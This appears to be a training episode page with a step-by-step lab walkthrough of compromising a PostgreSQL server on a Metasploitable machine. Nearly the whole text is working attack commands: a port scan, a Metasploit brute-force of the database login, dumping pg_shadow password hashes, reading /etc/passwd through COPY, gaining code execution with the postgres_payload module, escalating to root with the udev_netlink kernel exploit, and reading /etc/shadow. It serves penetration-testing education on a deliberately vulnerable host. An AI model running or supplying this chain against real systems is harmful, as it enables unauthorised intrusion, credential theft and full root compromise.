Among the many Object-Relational DBMS (ORDBMS) out there, one of the most popular ones is PostgreSQL. PostgreSQL, often referred to as Postgres, is an open-source Object-Relational DBMS supporting almost all SQL constructs. In this episode, Gianni explains how to attack a PostgreSQL database, read and write files via SQL, use weak permissions to get code execution on the target machine, and get root by exploiting a Linux kernel vulnerability.

Tools, Scripts, and Exploits

Steps

  1. Identify the listening services on the target machine
    • nmap -v -sV 192.168.75.149 -p-
  2. Bruteforce the PostGres instance
    • msfconsole
    • use auxiliary/scanner/postgres/postgres_login
    • set RHOST 192.168.75.149
    • run
  3. Connect to the database and gather information
    • psql -h 192.168.75.149 -U postgres -W   # password = postgres
    • SELECT VERSION();
    • SELECT usename, passwd FROM pg_shadow;
    • Test if you can read files from the system
      • CREATE TABLE myfile (input TEXT);
      • COPY myfile FROM ‘/etc/passwd’;
      • SELECT input FROM myfile;
    • Test if you can write files in /tmp
      • CREATE TABLE testfile (output TEXT);
      • INSERT INTO testfile(output) VALUES (‘test’);
      • COPY testfile(output) TO ‘/tmp/testfile’;
      • Go to Metasploitable and check if the file was created successfully
        • login with msfadmin/msfadmin
        • ls /tmp
        • cat /tmp/testfile
  4. Use the Metasploit’s postgres_payload module to get code execution
    • msfconsole
    • use exploit/linux/postgres/postgres_payload
    • show options
    • set RHOST 192.168.75.149
    • exploit
    • sysinfo
  5. Escalate to root
    • background
    • use exploit/linux/local/udev_netlink
    • show options
    • set SESSION 1
    • exploit
    • uuid
    • shell
    • whoami
    • cat /etc/shadow
  6. Game over!

Leave a Reply

Your email address will not be published. Required fields are marked *